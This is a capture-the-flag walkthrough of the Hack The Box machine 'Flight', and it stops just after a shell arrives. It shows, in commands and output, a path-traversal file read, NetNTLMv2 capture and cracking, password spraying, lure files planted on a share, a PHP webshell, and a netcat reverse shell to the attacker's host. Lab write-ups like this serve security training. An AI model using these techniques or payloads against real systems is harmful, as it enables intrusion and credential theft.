htb-flight
Flight is a Windows-centered box that puts a unique twist by showing both a Apache and PHP website as well as an internal IIS / ASPX website. I’ll get the PHP site to connect back to my server on SMB, leaking a Net NTLMv2, and crack that to get a plaintext password. I’ll get a list of domain users over RPC, and password spray that password to find another user using the same password. That user has write access to a share, where I’ll drop files designed to provoke another auth back to my server to catch another Net NTLMv2. That user has access to the new IIS site, and can write an ASPX webshell to get a shell as the IIS account. As a service account, it will authenticate over the network as the machine account. I’ll abuse that to get the administrator’s hash and from there a shell.
Recon
nmap
# Nmap 7.93 scan initiated Fri Mar 14 15:20:11 2025 as: nmap -sC -sV -oN flight.nmap 10000 10.10.11.187 Nmap scan report for 10.10.11.187 Host is up (0.0099s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 | http-methods: |_ Potentially risky methods: TRACE |_http-title: g0 Aviation 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-14 21:20:23Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-03-14T21:20:27 |_ start_date: N/A |_clock-skew: 6h59m59s | smb2-security-mode: | 311: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 14 15:21:04 2025 -- 2 IP addresses (1 host up) scanned in 53.39 seconds
This looks like a Windows DC with the domain name flight.htb, and a hostname of G0.
Lots of ports to potentially look at. I’ll prioritize SMB and Web, and check in with LDAP, Kerberos, and DNS if I don’t find what I need from them.
Subdomain Fuzz
Given the use of DNS names, I’ll fuzz port 80 for potential subdomains with wfuzz:
──(puck㉿kali)-[~/htb/flight] └─$ wfuzz -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 7069 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.11.187/ Total requests: 4989 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000624: 200 90 L 412 W 3996 Ch "school" Total time: 0 Processed Requests: 4989 Filtered Requests: 4988 Requests/sec.: 0
I’ll add both to my /etc/hosts file along with the host name:
10.10.11.187 flight.htb school.flight.htb g0.flight.htb
SMB – TCP 445
crackmapexec confirms the domain and host name:
┌──(puck㉿kali)-[~/htb/flight] └─$ nxc smb 10.10.11.187 SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
It isn’t able to get any information about shares:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] Error getting user: list index out of range
SMB 10.10.11.187 445 G0 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(puck㉿kali)-[~/htb/flight]
└─$ crackmapexec smb 10.10.11.187 --shares -u puck -p ''
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\puck: STATUS_LOGON_FAILURE
flight.htb – TCP 80
Site
The site is for an airline:
Most the links are dead or just lead back to this page.
Tech Stack
The “AIRLINES International Travel” link leads to index.html, which suggests this is a static site.
Directory Brute Force
I’ll run feroxbuster against the site, and include -x html,php since I know the site is using .html extensions and potentially PHP:
┌──(puck㉿kali)-[~/htb/flight]
└─$ feroxbuster -u http://flight.htb -x html,php
403 GET 9l 30w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 33w 296c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 30w 333c http://flight.htb/images => http://flight.htb/images/
301 GET 9l 30w 329c http://flight.htb/js => http://flight.htb/js/
301 GET 9l 30w 330c http://flight.htb/css => http://flight.htb/css/
200 GET 2l 7w 109c http://flight.htb/images/img3.gif
200 GET 1l 6w 170c http://flight.htb/images/img2.gif
--snip--
503 GET 11l 44w 399c http://flight.htb/examples
200 GET 706l 4305w 291438c http://flight.htb/IMAGES/bg_img.jpg
200 GET 1l 5w 698c http://flight.htb/IMAGES/bg_box1.jpg
403 GET 11l 47w 418c http://flight.htb/licenses
403 GET 11l 47w 418c http://flight.htb/server-status
200 GET 154l 530w 7069c http://flight.htb/Index.html
/phpmyadmin is on the box, but returns a forbidden on visiting:
┌──(puck㉿kali)-[~/htb/flight] └─$ curl http://flight.htb//phpmyadmin <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at flight.htb Port 80</address> </body></html>
con, aux, and prn all return 403 for .php, but also these return the same for /con and /con.html. It seems more like an Apache rule match than an actual page.
Nothing else of interest.
school.flight.htb
Site
The site is for an aviation school:
Tech Stack
The main page is index.php. In fact, the other pages that have content have URLs of the form http://school.flight.htb/index.php?view=about.html.
It’s a very common PHP structure where different pages on a site all use index.php that defines the header and footer and menus, and then some parameter specifying what page to include as the body. These are often vulnerable to path traversal (reading outside the current directory) and local file include (including PHP code that is executed) vulnerabilities.
Directory Brute Force
feroxbuster finds nothing interesting:
puck@kali$ feroxbuster -u http://school.flight.htb -x html,php
The same false positive blocks for con, aux, and prn show up here.Auth as svc_apache
File Read
It’s a very common PHP structure where different pages on a site all use index.php with some parameter specifying what page to include. These are often vulnerable to path traversal (reading outside the current directory) and local file include (including PHP code that is executed) vulnerabilities.
http://school.flight.htb/index.php?view=c:\windows\system32\drivers\etc\hosts
On a Linux box, I’d try to read /etc/passwd. Since this is Windows, I’ll try C:\windows\system32\drivers\etc\hosts, but it returns an error:
In fact, just having just view=\ results in the same blocked response. view=. returns nothing, but anything with .. in it also results in the blocked message.
I can try with / instead of \, make sure to use an absolute path, and it works:
http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts
┌──(puck㉿kali)-[~/htb/flight] └─$ curl http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts <!DOCTYPE html> <div id="page"> -snip- </div> # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost </html> ┌──(puck㉿kali)-[~/htb/flight]
Nothing interesting in that file, but it proves directory traversal and file read. It’s not yet clear if it’s an include or just a read.
RFI Test
HTTP
To figure out if it’s a read or include and if remote files are enabled, I’ll try a remote read over HTTP. This will quickly tell me if remote files are allowed, and if so, show if the site is using include or file_get_contents.
I’ll create a dummy PHP file named poc.txt:
<?php echo 'puck was here'; ?>
I’ll see if the server will load it remotely over HTTP by starting a local HTTP server and trying to include it. It works:
┌──(puck㉿kali)-[~/htb/flight] └─$ curl http://school.flight.htb/index.php?view=http://10.10.14.3/poc.txt <!DOCTYPE html> <html> --snip-- </div> <?php echo 'puck was here'; ?> <div id="footer"> --snip-- </body> </html> ┌──(puck㉿kali)-[~/htb/flight]
Unfortunately for me, its the text of the file, not processed as PHP. The source must be using file_get_contents to load the contents, not include.
SMB
Another way to include a file is over SMB. It won’t get anything that HTTP couldn’t get as far as execution, but the user will try to authenticate, and I could capture a NetNTLMv2 challenge/response (not really a hash, but often called one). I’ll start responder with sudo responder -I tun0, and then visit http://school.flight.htb/index.php?view=//10.10.14.3/share/poc.txt. There’s a hit:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:d49bf1afb16b568e:25888B10CFDD1D19B10962508F18B4A0:01010000000000000067B483F894DB017E17EF5DF4D6EB6400000000020008005800520038004C0001001E00570049004E002D005100440042005A00580059005900300052003000380004003400570049004E002D005100440042005A0058005900590030005200300038002E005800520038004C002E004C004F00430041004C00030014005800520038004C002E004C004F00430041004C00050014005800520038004C002E004C004F00430041004C00070008000067B483F894DB01060004000200000008003000300000000000000000000000003000006BB4476AA12502962C1B8BCF41739B8A40001AEC54AC8B29CB7853DCEC60FF3E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0034000000000000000000
john will find the password used by the svc_apache account, “S@Ss!K@*t13”:
┌──(puck㉿kali)-[~/htb/flight] └─$ john svc_apache-net-ntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status S@Ss!K@*t13 (svc_apache) 1g 0:00:00:04 DONE (2025-03-14 15:56) 0.2500g/s 2666Kp/s 2666Kc/s 2666KC/s SADSAM..Ryanelkins Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.
These creds work over SMB:
┌──(puck㉿kali)-[~/htb/flight] └─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
Auth as S.Moon
SMB Enumeration
Shares
crackmapexec shows the shares, including the standard administrative shares (ADMIN$, C$, and IPC$), the standard shares for a Windows DC (NETLOGON and SYSVOL), and three nonstandard shares (Shared, Users, and Web):
┌──(puck㉿kali)-[~/htb/flight] └─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --shares SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13 SMB 10.10.11.187 445 G0 [*] Enumerated shares SMB 10.10.11.187 445 G0 Share Permissions Remark SMB 10.10.11.187 445 G0 ----- ----------- ------ SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin SMB 10.10.11.187 445 G0 C$ Default share SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share SMB 10.10.11.187 445 G0 Shared READ SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share SMB 10.10.11.187 445 G0 Users READ SMB 10.10.11.187 445 G0 Web READ
I’ll take a look inNETLOGON and SYSVOL, but nothing abnormal or useful jumps out.
Users
The Users share looks like it’s the C:\Users directory on Flight:
┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/users -U svc_apache --password='S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu Sep 22 22:16:56 2022
.. DR 0 Thu Sep 22 22:16:56 2022
.NET v4.5 D 0 Thu Sep 22 21:28:03 2022
.NET v4.5 Classic D 0 Thu Sep 22 21:28:02 2022
Administrator D 0 Mon Oct 31 19:34:00 2022
All Users DHSrn 0 Sat Sep 15 09:28:48 2018
C.Bum D 0 Thu Sep 22 22:08:23 2022
Default DHR 0 Tue Jul 20 21:20:24 2021
Default User DHSrn 0 Sat Sep 15 09:28:48 2018
desktop.ini AHS 174 Sat Sep 15 09:16:48 2018
Public DR 0 Tue Jul 20 21:23:25 2021
svc_apache D 0 Fri Oct 21 20:50:21 2022
5056511 blocks of size 4096. 1160682 blocks available
smb: \>
There’s nothing interesting in svc_apache, and svc_apache can’t get into any of the other directories.
Shared
The Shared share looks to be empty:
puck@kali$ smbclient //flight.htb/shared -U svc_apache 'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 28 20:21:28 2022
.. D 0 Fri Oct 28 20:21:28 2022
7706623 blocks of size 4096. 3749019 blocks available
Web
The Web share has folders for the two websites:
┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/web -U svc_apache 'S@Ss!K@*t13'
Password for [WORKGROUP\svc_apache]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 14 22:57:00 2025
.. D 0 Fri Mar 14 22:57:00 2025
flight.htb D 0 Fri Mar 14 22:57:00 2025
school.flight.htb D 0 Fri Mar 14 22:57:00 2025
5056511 blocks of size 4096. 1249397 blocks available
smb: \>
Looking around shows both are basically static websites, with no database or creds or anything useful at this point. I’ll also confirm that svc_apache can’t write to any of these folders.
Password Spray
List Domain Users
I was able to get another user name, C.Bum, from the users share, but there may be more domain users. I’ll use lookupsid.py from Impacket to get a list of more:
┌──(puck㉿kali)-[~/htb/flight] └─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Brute forcing SIDs at flight.htb [*] StringBinding ncacn_np:flight.htb[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209 498: flight\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: flight\Administrator (SidTypeUser) 501: flight\Guest (SidTypeUser) --snip-- 1613: flight\O.Possum (SidTypeUser) 1614: flight\WebDevs (SidTypeGroup)
I’ll use some Bash foo to get that into a list of usernames:
┌──(puck㉿kali)-[~/htb/flight] └─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb | grep SidTypeUser | cut -d' ' -f 2 | cut -d'\' -f 2 | tee users Administrator Guest krbtgt G0$ S.Moon R.Cold G.Lors L.Kein M.Gold C.Bum W.Walker I.Francis D.Truff V.Stevens svc_apache O.Possum
crackmapexec can also pull this list with the :
┌──(puck㉿kali)-[~/htb/flight] └─$ nxc smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' -d flight.htb --users SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13 SMB 10.10.11.187 445 G0 -Username- -Last PW Set- -BadPW- -Description- SMB 10.10.11.187 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain SMB 10.10.11.187 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain SMB 10.10.11.187 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account SMB 10.10.11.187 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer SMB 10.10.11.187 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant SMB 10.10.11.187 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager SMB 10.10.11.187 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester SMB 10.10.11.187 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin SMB 10.10.11.187 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer SMB 10.10.11.187 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer SMB 10.10.11.187 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here SMB 10.10.11.187 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager SMB 10.10.11.187 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary SMB 10.10.11.187 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web SMB 10.10.11.187 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
Spray
It’s not uncommon for someone in charge of a service account to reuse their password with that service account. I’ll see if any of the accounts above share that password with crackmapexec. I always like to use the --continue-on-success in case more than one match:
┌──(puck㉿kali)-[~/htb/flight] └─$ nxc smb 10.10.11.187 -u users -p 'S@Ss!K@*t13' -d flight.htb --continue-on-success SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) SMB 10.10.11.187 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\G0$:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13 SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13 SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
S.Moon uses that same password!
Auth as C.Bum
SMB
In addition to the read access, S.Moon has write access to Shared:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ
Capture NetNTLMv2
Background
With write access to an otherwise empty share named Shared, there are files I can drop that might entice any legit visiting user to try to authenticate to my host. This post has a list of some of the ways this can be done. ntlm_theft is a nice tool to create a bunch of these files.
Upload Files
I’ll use ntml_theft.py to create all the files:
┌──(puck㉿kali)-[~/htb/flight/ntlm_theft] └─$ python ntlm_theft.py -g all -s 10.10.14.4 -f puck Created: puck/puck.scf (BROWSE TO FOLDER) Created: puck/puck-(url).url (BROWSE TO FOLDER) Created: puck/puck-(icon).url (BROWSE TO FOLDER) Created: puck/puck.lnk (BROWSE TO FOLDER) Created: puck/puck.rtf (OPEN) Created: puck/puck-(stylesheet).xml (OPEN) Created: puck/puck-(fulldocx).xml (OPEN) Created: puck/puck.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) Created: puck/puck-(includepicture).docx (OPEN) Created: puck/puck-(remotetemplate).docx (OPEN) Created: puck/puck-(frameset).docx (OPEN) Created: puck/puck-(externalcell).xlsx (OPEN) Created: puck/puck.wax (OPEN) Created: puck/puck.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) Created: puck/puck.asx (OPEN) Created: puck/puck.jnlp (OPEN) Created: puck/puck.application (DOWNLOAD AND OPEN) Created: puck/puck.pdf (OPEN AND ALLOW) Created: puck/zoom-attack-instructions.txt (PASTE TO CHAT) Created: puck/Autorun.inf (BROWSE TO FOLDER) Created: puck/desktop.ini (BROWSE TO FOLDER) Generation Complete.
Connecting from the directory with the ntlm_theft output, I’ll upload all of them to the share:
┌──(puck㉿kali)-[~/htb/flight/ntlm_theft/puck]
└─$ smbclient //flight.htb/shared -U S.Moon 'S@Ss!K@*t13'
Password for [WORKGROUP\S.Moon]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 14 23:18:37 2025
.. D 0 Fri Mar 14 23:18:37 2025
5056511 blocks of size 4096. 1248834 blocks available
smb: \> prompt false
smb: \> mput *
putting file puck-(stylesheet).xml as \puck-(stylesheet).xml (4.7 kb/s) (average 4.7 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \puck.wax
NT_STATUS_ACCESS_DENIED opening remote file \puck.scf
NT_STATUS_ACCESS_DENIED opening remote file \puck-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file puck.application as \puck.application (55.5 kb/s) (average 28.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \puck.rtf
NT_STATUS_ACCESS_DENIED opening remote file \puck.lnk
putting file puck.jnlp as \puck.jnlp (5.8 kb/s) (average 20.6 kb/s)
putting file desktop.ini as \desktop.ini (1.4 kb/s) (average 15.9 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \puck.htm
NT_STATUS_ACCESS_DENIED opening remote file \puck-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \puck.asx
NT_STATUS_ACCESS_DENIED opening remote file \puck.pdf
NT_STATUS_ACCESS_DENIED opening remote file \puck-(frameset).docx
putting file puck-(fulldocx).xml as \puck-(fulldocx).xml (1243.6 kb/s) (average 398.3 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck.m3u
NT_STATUS_ACCESS_DENIED opening remote file \puck-(url).url
smb: \> ls
. D 0 Fri Mar 14 23:27:19 2025
.. D 0 Fri Mar 14 23:27:19 2025
desktop.ini A 46 Fri Mar 14 23:27:19 2025
puck-(fulldocx).xml A 72584 Fri Mar 14 23:27:19 2025
puck-(stylesheet).xml A 162 Fri Mar 14 23:27:19 2025
puck.application A 1649 Fri Mar 14 23:27:19 2025
puck.jnlp A 191 Fri Mar 14 23:27:19 2025
5056511 blocks of size 4096. 1248814 blocks available
smb: \>
Interestingly, a bunch are blocked. But a few do make it.
Responder
With responder still running, after a minute or two there’s a hit from C.Bum:
[+] Listening for events... [SMB] NTLMv2-SSP Client : 10.10.11.187 [SMB] NTLMv2-SSP Username : flight.htb\c.bum [SMB] NTLMv2-SSP Hash : c.bum::flight.htb:952d95ad83925991:C89061B541623C50B94E338EC0561438:01010000000000000081AC2FFE94DB01334B6C122F9237C500000000020008004B0044003800410001001E00570049004E002D0043004C0032003700590031005500410043004A005A0004003400570049004E002D0043004C0032003700590031005500410043004A005A002E004B004400380041002E004C004F00430041004C00030014004B004400380041002E004C004F00430041004C00050014004B004400380041002E004C004F00430041004C00070008000081AC2FFE94DB01060004000200000008003000300000000000000000000000003000006BB4476AA12502962C1B8BCF41739B8A40001AEC54AC8B29CB7853DCEC60FF3E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0034000000000000000000
Crack NetNTLMv2
john with rockyou will quickly return the password “Tikkycoll_431012284”:
┌──(puck㉿kali)-[~/htb/flight]
└─$ john c.bum-net-ntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)
1g 0:00:00:03 DONE (2025-03-14 16:33) 0.3003g/s 3164Kp/s 3164Kc/s 3164KC/s TinyMutt69..Thehunter22
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u c.bum -p 'Tikkycoll_431012284'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
Shell as svc_apache
Webshell
SMB
C.Bum has write access to the Web share:
┌──(puck㉿kali)-[~/htb/flight] └─$ nxc smb flight.htb -u c.bum -p 'Tikkycoll_431012284' --shares SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284 SMB 10.10.11.187 445 G0 [*] Enumerated shares SMB 10.10.11.187 445 G0 Share Permissions Remark SMB 10.10.11.187 445 G0 ----- ----------- ------ SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin SMB 10.10.11.187 445 G0 C$ Default share SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share SMB 10.10.11.187 445 G0 Shared READ,WRITE SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share SMB 10.10.11.187 445 G0 Users READ SMB 10.10.11.187 445 G0 Web READ,WRITE
Upload Webshell
I’ll start with a standard webshell, shell.php:
<?php system($_REQUEST['cmd']); ?>
I’ll move into the styles directory in school.flight.htb, and upload it there:
┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/web -U c.bum 'Tikkycoll_431012284'
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 14 23:37:14 2025
.. D 0 Fri Mar 14 23:37:14 2025
flight.htb D 0 Fri Mar 14 23:37:00 2025
school.flight.htb D 0 Fri Mar 14 23:37:00 2025
5056511 blocks of size 4096. 1248132 blocks available
smb: \> cd school.flight.htb
smb: \school.flight.htb\> ls
. D 0 Fri Mar 14 23:42:00 2025
.. D 0 Fri Mar 14 23:42:00 2025
about.html A 1689 Tue Oct 25 05:54:45 2022
blog.html A 3618 Tue Oct 25 05:53:59 2022
home.html A 2683 Tue Oct 25 05:56:58 2022
images D 0 Fri Mar 14 23:42:00 2025
index.php A 2092 Thu Oct 27 09:59:25 2022
lfi.html A 179 Thu Oct 27 09:55:16 2022
styles D 0 Fri Mar 14 23:42:00 2025
5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\> cd styles
smb: \school.flight.htb\styles\> ls
. D 0 Fri Mar 14 23:42:00 2025
.. D 0 Fri Mar 14 23:42:00 2025
ie6.css A 587 Fri Dec 2 20:42:00 2011
style.css A 11045 Wed Jan 25 21:17:32 2012
5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\styles\> put shell.php
putting file shell.php as \school.flight.htb\styles\shell.php (1.2 kb/s) (average 1.2 kb/s)
smb: \school.flight.htb\styles\> ls
. D 0 Fri Mar 14 23:42:47 2025
.. D 0 Fri Mar 14 23:42:47 2025
ie6.css A 587 Fri Dec 2 20:42:00 2011
shell.php A 36 Fri Mar 14 23:42:47 2025
style.css A 11045 Wed Jan 25 21:17:32 2012
5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\styles\>
I’m using styles just to be a bit more hidden. The webshell works:
┌──(puck㉿kali)-[~/htb/flight]
└─$ curl school.flight.htb/styles/shell.php?cmd=whoami
flight\svc_apache
Shell
To go from webshell to shell, I’ll upload nc64.exe to the same folder:
smb: \school.flight.htb\styles\> put nc64.exe nc64.exe
putting file nc64.exe as \school.flight.htb\styles\nc64.exe (99.6 kb/s) (average 99.6 kb/s)
Now I’ll invoke it over the webshell:
puck@kali$ curl -G school.flight.htb/styles/shell.php --data-urlencode 'cmd=nc64.exe -e cmd.exe 10.10.14.4 443'
It hangs, but at a nc listening, there’s a shell:
